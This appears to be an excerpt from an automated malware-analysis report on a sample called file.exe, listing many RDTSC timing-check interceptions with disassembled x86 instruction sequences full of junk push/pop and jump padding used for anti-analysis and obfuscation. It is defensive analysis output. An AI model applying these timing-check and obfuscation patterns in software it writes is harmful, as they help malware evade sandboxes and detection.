          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A2DC second address: B5A2EA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6B18E88FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A2EA second address: B5A2F4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6B19184AB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A2F4 second address: B5A2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A2FA second address: B5A31C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6B19184AC5h 0x00000008 pushad 0x00000009 jno 00007F6B19184AB6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E4BC second address: B5E4C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E19E second address: B5E1B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007F6B19184ABAh 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C131 second address: B6C13D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6B18E88FE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C13D second address: B6C16D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F6B19184AC4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C16D second address: B6C171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C171 second address: B6C175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6FAE1 second address: B6FAFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F6B18E88FE6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73420 second address: B7342C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7342C second address: B73430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73430 second address: B7343C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7343C second address: B73440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A94B second address: B7A951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A951 second address: B7A99A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F6B18E88FF0h 0x00000011 jmp 00007F6B18E88FEDh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push edi 0x0000001c push ecx 0x0000001d js 00007F6B18E88FE6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A99A second address: B7A9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A9A5 second address: B7A9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A9A9 second address: B7A9AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79265 second address: B79269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79269 second address: B79282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B796C1 second address: B796C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B796C5 second address: B796CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B796CF second address: B79704 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F6B18E88FEFh 0x0000000c je 00007F6B18E88FE6h 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 push ecx 0x00000016 jmp 00007F6B18E88FEDh 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B798B8 second address: B798BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B798BC second address: B798C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B798C4 second address: B798CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B798CC second address: B798D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B79B7F second address: B79B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A612 second address: B7A631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jc 00007F6B18E89005h 0x0000000f jmp 00007F6B18E88FEDh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7A631 second address: B7A637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B820FC second address: B82100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82100 second address: B82104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B82104 second address: B82113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6B18E88FE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81C22 second address: B81C43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F6B19184AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F6B19184AB6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 pushad 0x00000019 jne 00007F6B19184AB6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91309 second address: B9130F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9130F second address: B9133B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F6B19184AC4h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6B19184AC2h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4866 second address: BB486B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB486B second address: BB4893 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F6B19184AC2h 0x00000008 jmp 00007F6B19184ABFh 0x0000000d pop edi 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB5194 second address: BB519C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6AA1 second address: BB6ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6B19184ABBh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6ABB second address: BB6ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6ABF second address: BB6AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6AC3 second address: BB6AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6B18E88FECh 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB81FA second address: BB822D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007F6B19184AB6h 0x0000000c jmp 00007F6B19184ABBh 0x00000011 push edx 0x00000012 pop edx 0x00000013 jbe 00007F6B19184AB6h 0x00000019 popad 0x0000001a pop edx 0x0000001b je 00007F6B19184ADDh 0x00000021 jno 00007F6B19184AB8h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBAC0D second address: BBAC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBAC11 second address: BBAC1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBAEC8 second address: BBAF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 ja 00007F6B18E88FE6h 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 push 00000004h 0x00000013 mov edx, dword ptr [ebp+122D1802h] 0x00000019 call 00007F6B18E88FE9h 0x0000001e jmp 00007F6B18E88FEBh 0x00000023 push eax 0x00000024 jmp 00007F6B18E88FF0h 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F6B18E88FF7h 0x00000034 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBAF23 second address: BBAF29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB264 second address: BBB26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB26D second address: BBB271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBCD28 second address: BBCD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBCD2C second address: BBCD3E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6B19184AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F6B19184ABCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBCD3E second address: BBCD54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F6B18E88FEDh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBCD54 second address: BBCD7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6B19184AC6h 0x0000000d pushad 0x0000000e jl 00007F6B19184AB6h 0x00000014 pushad 0x00000015 popad 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBCD7F second address: BBCD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC9182 second address: AC918C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6B19184ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC918C second address: AC919F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c ja 00007F6B18E88FE6h 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6032A second address: 4A60330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60330 second address: 4A60334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60334 second address: 4A60363 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6B19184AC6h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ebx, esi 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60363 second address: 4A60369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60369 second address: 4A603A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F6B19184ABEh 0x00000011 mov ecx, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov dl, 9Fh 0x00000019 mov edi, esi 0x0000001b popad 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A603BC second address: 4A603D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A603D7 second address: 4A603DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A804A8 second address: 4A80505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 movsx edi, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F6B18E88FF2h 0x00000012 push eax 0x00000013 pushad 0x00000014 jmp 00007F6B18E88FF1h 0x00000019 mov ax, 8F37h 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f pushad 0x00000020 pushad 0x00000021 movzx ecx, bx 0x00000024 movsx ebx, ax 0x00000027 popad 0x00000028 mov edi, esi 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F6B18E88FF5h 0x00000034 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80505 second address: 4A8051F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8051F second address: 4A805C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dh, cl 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a mov di, cx 0x0000000d pushfd 0x0000000e jmp 00007F6B18E88FEAh 0x00000013 xor eax, 4A0F5818h 0x00000019 jmp 00007F6B18E88FEBh 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ecx 0x00000021 pushad 0x00000022 call 00007F6B18E88FF4h 0x00000027 pushfd 0x00000028 jmp 00007F6B18E88FF2h 0x0000002d sbb esi, 297DB9A8h 0x00000033 jmp 00007F6B18E88FEBh 0x00000038 popfd 0x00000039 pop eax 0x0000003a pushfd 0x0000003b jmp 00007F6B18E88FF9h 0x00000040 and cx, F5C6h 0x00000045 jmp 00007F6B18E88FF1h 0x0000004a popfd 0x0000004b popad 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F6B18E88FEDh 0x00000054 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A805C8 second address: 4A8066E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6B19184AC1h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F6B19184ABAh 0x00000018 sbb ecx, 7CDD4BF8h 0x0000001e jmp 00007F6B19184ABBh 0x00000023 popfd 0x00000024 mov ax, 7D2Fh 0x00000028 popad 0x00000029 pushfd 0x0000002a jmp 00007F6B19184AC4h 0x0000002f or ax, 2658h 0x00000034 jmp 00007F6B19184ABBh 0x00000039 popfd 0x0000003a popad 0x0000003b lea eax, dword ptr [ebp-04h] 0x0000003e jmp 00007F6B19184AC6h 0x00000043 nop 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F6B19184AC7h 0x0000004b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8066E second address: 4A806A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F6B18E88FF7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A806DF second address: 4A8070D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6B19184AC1h 0x00000009 adc si, 5A26h 0x0000000e jmp 00007F6B19184AC1h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A807B5 second address: 4A807CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A807CE second address: 4A807EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A807EB second address: 4A8004A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d sub esp, 04h 0x00000010 xor ebx, ebx 0x00000012 cmp eax, 00000000h 0x00000015 je 00007F6B18E89135h 0x0000001b xor eax, eax 0x0000001d mov dword ptr [esp], 00000000h 0x00000024 mov dword ptr [esp+04h], 00000000h 0x0000002c call 00007F6B1D014B3Bh 0x00000031 mov edi, edi 0x00000033 pushad 0x00000034 call 00007F6B18E88FF3h 0x00000039 movzx esi, dx 0x0000003c pop edi 0x0000003d mov edi, esi 0x0000003f popad 0x00000040 xchg eax, ebp 0x00000041 jmp 00007F6B18E88FECh 0x00000046 push eax 0x00000047 jmp 00007F6B18E88FEBh 0x0000004c xchg eax, ebp 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 call 00007F6B18E88FEBh 0x00000055 pop esi 0x00000056 mov si, di 0x00000059 popad 0x0000005a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8004A second address: 4A8005F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B19184AC1h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8005F second address: 4A80063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80063 second address: 4A80077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, ah 0x0000000f mov dx, 5DA6h 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80077 second address: 4A8008E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B18E88FF3h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8008E second address: 4A800AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6B19184AC0h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A800AA second address: 4A800FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B18E88FEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 3EAF27C1h 0x0000000e jmp 00007F6B18E88FEFh 0x00000013 xor dword ptr [esp], 4B01B989h 0x0000001a jmp 00007F6B18E88FF6h 0x0000001f push 2B594ADBh 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6B18E88FECh 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A800FD second address: 4A80103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80103 second address: 4A80107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80107 second address: 4A80130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B19184ABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 5EF061ABh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6B19184ABDh 0x00000019 rdtsc
